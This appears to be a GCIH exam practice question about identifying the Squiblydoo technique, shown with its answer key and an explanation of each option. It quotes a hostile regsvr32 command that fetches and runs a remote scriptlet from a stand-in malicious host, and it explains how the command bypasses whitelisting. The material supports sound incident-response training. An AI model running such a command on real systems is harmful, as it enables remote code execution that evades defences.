GCIH Endpoint Attack and Pivoting Practice Question
During an investigation of a compromised Windows 10 workstation, you observe the following command executed by a user process: `regsvr32.exe /s /u /i:https://malicious.example/payload.sct scrobj.dll`. The user has no legitimate reason to run regsvr32. Which attack technique is this command most indicative of?
⚠ Common exam trap
The trap here is assuming any regsvr32 usage is benign COM registration, when the /i: URL and .sct extension clearly indicate remote scriptlet execution.
Answer choices
Why each option matters
Answer the question above first, then reveal the full breakdown to understand why each option is right or wrong.
Correct answer & explanation
✓
Squiblydoo
The command uses regsvr32.exe with the /i: parameter to load a remote scriptlet from a URL, a technique known as Squiblydoo. This bypasses application whitelisting because regsvr32 is a trusted, signed binary. The attacker leverages this to execute code without writing a persistent executable to disk, making detection challenging.
Answer analysis
Option-by-option breakdown
For each option: why learners choose it and why it is or isn't the right answer here.
- ✗
COM hijacking via registry modification
Why it's wrong here
COM hijacking modifies registry keys to redirect CLSID references to an attacker-controlled DLL. The command does not modify the registry; it directly invokes regsvr32 to fetch and execute a remote scriptlet, which is a different technique.
- ✗
DLL hijacking through a malicious scrobj.dll
Why it's wrong here
DLL hijacking typically involves placing a malicious DLL in a search order path to be loaded by a legitimate application. Here scrobj.dll is a legitimate Microsoft COM scriptlet component, and the malicious content is the remote .sct file, not a replaced DLL.
- ✗
AppLocker bypass via msbuild.exe
Why it's wrong here
msbuild.exe is a different signed Microsoft binary that can execute inline C# tasks from a project file, but it does not use regsvr32.exe or .sct scriptlets. The observed command specifically abuses regsvr32's scriptlet support, so msbuild is not involved here.
- ✓
Squiblydoo
Why this is correct
This command uses regsvr32.exe to load a remote scriptlet (.sct) via the /i: URL parameter, bypassing application whitelisting and executing arbitrary code. This is the classic Squiblydoo technique, which abuses the trusted regsvr32 binary to download and execute a scriptlet, often for initial access or lateral movement.
About these practice questions
Courseiva writes every GCIH question from scratch — 322 in total, each with an explanation and a wrong-answer breakdown. None are copied from real exams or dumps. Learn why practice questions differ from exam dumps →
JA
Written and reviewed by Johnson Ajibi, MSc IT Security
Senior Network & Security Engineer · founder of Courseiva
Last reviewed September 2026 · checked against the official GIAC exam blueprint
This GCIH practice question is part of Courseiva's free GIAC certification practice question bank. Courseiva provides original exam-style practice questions with explanations, topic-based practice, mock exams, readiness tracking, and study analytics to help learners prepare for the GCIH exam.